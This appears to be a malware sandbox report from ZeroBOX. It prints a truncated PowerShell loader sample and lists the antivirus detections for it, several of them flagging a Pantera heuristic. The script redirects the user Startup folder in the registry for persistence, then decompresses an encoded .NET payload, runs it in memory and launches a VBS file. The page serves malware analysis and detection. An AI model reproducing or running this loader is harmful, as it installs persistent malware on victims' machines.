Static | ZeroBOX

$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)

$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters

$CompilerParametres.ReferencedAssemblies.Add("System.dll")

$CompilerParametres.ReferencedAssemblies.Add("System.Management.dll")

$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")

$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")

$CompilerParametres.IncludeDebugInformation = $false

$CompilerParametres.GenerateExecutable = $false

$CompilerParametres.GenerateInMemory = $true

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost\";

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\WindowsHost\";

$CompilerParametres.IncludeDebugInformation = $false

$CompilerParametres.GenerateExecutable = $false

$CompilerParametres.GenerateInMemory = $true

$wgmoiXOoYKyGtKX = @'

7Xt5PJTf9/idxYx1smVLNUQhZIsIWbNnJ23eY2ZoMotmxp6lVNJCRKWQkiKlRKuljVIhShvKWiqhhaT1e59nUL3f78/r+/nn98/v9X14zr3n3HPPOffcc7d5nsdtxW6AAwDg4f3zJwAXgeCyAv/7lQhv0uzLJFAh0qhyEePaqOKzlsEjh3E5IVwKi0ylsNkcPjmITuaGs8kMNtnO3ZvM4tDouhISomoTMjzsAXDF4MAWuW97JuV2ASxGDCMMgAFEhAW05x4QkCc5rAR5rMBuAH6lIF9AB2hitQUASfT/VzqVoNdOKNcdyfwFb8K/N1IcNRSARf+FT6Yu8pTp6CUMccffcF0+PYoP0z49AS/aVuw/RPyly+VxqWDCtkkbjf7ks4L/ulw6k0OdsDVxQpbZP/hs/m7mVQ9B6ohWEQL1FrCd0gBgBCIIVrCjtin+F+2duJQ0ZGAtLQO5XbA2RgOKEdWahdXAIWlpPETxOrO4MAlrhiSsBuw2UY4QBDzYLtFEpBxl0lKKRzoXVk3EClCcANUQQyT58aBvCRqwsaJ8KAKbiJbaYHUIXGh/mBaWI4GwQXtk9HBgBUDbI6VBQrRNg0BUTmy+LYF4QFyYA4NBVEKEIwUTLAoVNWDzRbXJIhzYElENUagI+ys7UYoV1iLKLxcjElIZBhdktRA9eDBX4DMpMrDCALT9ovNFcAQ5IkcWkU6Qg9yc6TCrLqbzCtaZoYcFq2AdHGKbHGIWlrsEms+RR1RYQrUKMCNGlOPBDhAV5ykhpgqLIM0miMit48yAuIgM/rmysDZBmKMMsQ6iNoEoyE3U1pLCa2GUEbvmACULIApQG2cAbQdBHvEPtA4ZP1JYnDTgzER0EwkaEkg3ymoh7YJ6YGTAcs4sWNgqaNlvzZlL0IJtwYF9gvCUwqN+5MxGWoRHXaetKUjRbtGAcS2qI8/1h039jUzQUEFdQEC6iSAurIOXlXjuJKwB+4sg9lz0VxtxAg4ZvBReW1YKjzLICBGlhDRUEQc9n/5cHJYQ

$jtwC = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($wgmoiXOoYKyGtKX),[IO.Compression.CompressionMode]::Decompress)

$H1 = New-Object Byte[](15360)

$jtwC.Read($H1, 0, 15360) | Out-Null

[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))

[Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$H1)

[System.Threading.Thread]::Sleep(1000)

return $T.GetMethod('Run').Invoke($null, $Params)

} catch { }

[System.Threading.Thread]::Sleep(7000)

Start "C:\ProgramData\WindowsHost\WindowsStateRepositoryCore.vbs"

Antivirus	Signature
Bkav	Clean
Lionic	Clean
MicroWorld-eScan	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
CMC	Clean
CAT-QuickHeal	Clean
McAfee	Clean
Malwarebytes	Clean
VIPRE	Clean
Sangfor	Malware.Generic-Script.Save.d1efc4f5
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
Cyren	Clean
Symantec	Clean
ESET-NOD32	Clean
Baidu	Clean
TrendMicro-HouseCall	Clean
Avast	Clean
ClamAV	Clean
Kaspersky	Clean
BitDefender	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
NANO-Antivirus	Clean
ViRobot	Clean
Tencent	Clean
Ad-Aware	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Emsisoft	Heur.BZC.PZQ.Pantera.14.BDF4FC0C (B)
Comodo	Clean
F-Secure	Clean
DrWeb	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	Clean
FireEye	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Sophos	Clean
Ikarus	Clean
GData	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Kingsoft	Clean
Gridinsoft	Clean
Arcabit	Clean
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Clean
Cynet	Clean
AhnLab-V3	Clean
VBA32	Clean
ALYac	Heur.BZC.PZQ.Pantera.14.BDF4FC0C
MAX	malware (ai score=83)
Zoner	Clean
Rising	Clean
Yandex	Clean
TACHYON	Clean
MaxSecure	Clean
Fortinet	Clean
Panda	Clean